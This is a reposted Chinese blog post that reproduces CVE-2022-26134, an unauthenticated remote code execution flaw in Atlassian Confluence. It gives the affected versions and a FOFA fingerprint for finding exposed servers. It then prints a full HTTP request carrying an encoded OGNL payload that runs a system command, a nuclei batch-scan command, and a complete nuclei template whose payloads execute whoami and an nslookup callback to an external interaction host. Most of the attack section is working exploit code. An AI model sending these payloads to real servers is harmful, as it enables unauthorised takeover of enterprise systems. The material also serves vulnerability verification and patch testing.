CVE-2022-26134 Atlassian Confluence RCE,网络安全爱好者中心-神域博客网

本文转载于公众号：融云攻防实验室，原文地址：

漏洞复现 CVE-2022-26134 Atlassian Confluence RCE

0x01 阅读须知

资源来源于网络，安全小天地只是再次进行分享，使用请遵循本站的免责申明

0x02 漏洞描述

Atlassian Confluence是一个专业的企业知识管理与协同软件，主要用于公司内员工创建知识库并建立知识管理流程，也可以用于构建企业wiki。Atlassian Confluence存在远程代码执行漏洞，攻击者可以利用该漏洞直接获取目标系统权限。

图片[1]-CVE-2022-26134 Atlassian Confluence RCE-安全小天地

0x03 漏洞复现

漏洞影响:

Confluence Server&Data Center ≥ 1.3.0
Atlassian Confluence Server and Data Center <7.4.17
Atlassian Confluence Server and Data Center <7.13.7
Atlassian Confluence Server and Data Center <7.14.3
Atlassian Confluence Server and Data Center <7.15.2
Atlassian Confluence Server and Data Center <7.16.4
Atlassian Confluence Server and Data Center <7.17.4
Atlassian Confluence Server and Data Center <7.18.1

FOFA:icon_hash=”-305179312″

1.抓包并修改payload，执行id命令

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/2
Host: x.x.x.x
Cookie: JSESSIONID=B05932CEC202F21734AE4E090D94229A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

图片[2]-CVE-2022-26134 Atlassian Confluence RCE-安全小天地

2.nuclei漏洞脚本如下（nuclei稳定快，编写poc简单，有社区维护，推荐使用）

nuclei下载地址：https://github.com/projectdiscovery/nuclei

批量验证命令：
nuclei.exe -l subs.txt -t cves/2022/CVE-2022-26134.yaml

yaml POC：
id: CVE-2022-26134

info:
  name: Confluence - Remote Code Execution via OGNL template injection
  author: pdteam,jbertman
  severity: critical
  description: |
    Critical severity unauthenticated remote code execution vulnerability in Confluence Server and Data Center.
  reference:
    - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
    - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
  metadata:
    shodan-query: http.component:\"Atlassian Confluence\"
  classification:
    cve-id: CVE-2022-26134
  tags: cve,cve2022,confluence,rce,ognl,oast

requests:
  - method: GET
    path:
      - \"{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/\"
      - \"{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/\"

    stop-at-first-match: true
    req-condition: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - \'contains(to_lower(all_headers_1), \"x-cmd-response:\")\'

      - type: dsl
        dsl:
          - \'contains(interactsh_protocol, \"dns\")\'
          - \'contains(to_lower(response_2), \"confluence\")\'
        condition: and

    extractors:
      - type: kval
        part: header
        kval:
          - \"x_cmd_response\"

------本文已结束，感谢您的阅读------

THE END